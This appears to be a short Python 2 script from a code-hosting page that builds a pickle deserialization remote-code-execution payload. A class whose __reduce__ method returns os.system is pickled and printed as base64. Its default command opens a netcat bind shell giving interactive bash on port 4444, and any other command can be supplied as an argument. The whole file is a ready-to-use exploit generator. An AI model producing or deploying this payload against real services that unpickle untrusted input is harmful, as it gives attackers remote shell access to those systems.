21 lines
482 B
Python
21 lines
482 B
Python
|
#!/usr/bin/python
|
||
|
|
#
|
||
|
|
# Pickle deserialization RCE payload.
|
||
|
|
# To be invoked with command to execute at it's first parameter.
|
||
|
|
# Otherwise, the default one will be used.
|
||
|
|
#
|
||
|
|
|
||
|
|
import cPickle
|
||
|
|
import os
|
||
|
|
import sys
|
||
|
|
import base64
|
||
|
|
|
||
|
|
DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444"
|
||
|
|
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND
|
||
|
|
|
||
|
|
class PickleRce(object):
|
||
|
|
def __reduce__(self):
|
||
|
|
return (os.system,(COMMAND,))
|
||
|
|
|
||
|
|
print base64.b64encode(cPickle.dumps(PickleRce()))
|